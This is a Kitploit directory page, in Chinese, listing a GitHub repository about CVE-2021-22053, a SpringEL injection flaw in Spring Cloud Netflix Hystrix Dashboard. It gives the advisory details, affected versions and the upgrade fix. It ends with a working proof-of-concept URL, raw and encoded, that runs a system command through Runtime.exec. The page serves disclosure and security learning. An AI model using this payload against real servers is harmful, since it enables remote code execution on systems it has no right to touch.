Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
spring-cloud-netflix-hystrix-dashboard-cve-2021-22053 — Spring Cloud Netflix Hystrix Dashboard 模板解析漏洞 CVE-2021-22053 | Kitploit
工具/GitHubGitHub/seccoder-security-lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053
漏洞分析代码分析漏洞利用Web应用程序漏洞利用学习与教育
GitHubseccoder-security-lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053

spring-cloud-netflix-hystrix-dashboard-cve-2021-22053

Spring Cloud Netflix Hystrix Dashboard 模板解析漏洞 CVE-2021-22053

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
37813年前Kitploit 审核通过
分享

CVE-2021-22053:Spring Cloud Netflix Hystrix Dashboard 模板解析漏洞

严重性

高危

供应商

Spring(VMware 旗下)

描述

同时使用 spring-cloud-netflix-hystrix-dashboard 和 spring-boot-starter-thymeleaf 的应用,在解析视图模板时,会暴露一种执行请求 URI 路径中提交的代码的方式。当请求发送至 /hystrix/monitor;[user-provided data] 时,hystrix/monitor 之后的路径元素会被作为 SpringEL 表达式进行求值,从而可能导致代码执行。

受影响的 VMware 产品和版本

除非另有说明,否则严重性均为高危。

  • Spring Cloud Netflix
    • 2.2.0.RELEASE 至 2.2.9.RELEASE
    • 较旧的、不受支持的版本同样受影响。

缓解措施

受影响版本的用户应采取以下缓解措施:用户应升级到 2.2.10.RELEASE+。无需其他步骤。已修复该问题的版本包括:

  • Spring Cloud Netflix
    • 2.2.10.RELEASE+

致谢

该漏洞由 SecCoder Security Lab 的 threedr3am 发现并负责任地披露([email protected])。

参考

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

历史记录

2021-11-17:初始漏洞报告发布。

POC

原始:

root@kitploit:~
http://127.0.0.1:8080/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("open -a calculator")}__::.x/

编码后:

root@kitploit:~
http://127.0.0.1:8080/hystrix/;a=a/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22open%20-a%20calculator%22)%7D__::.x/

附注:命令中不能包含斜杠 '/'。

下载工具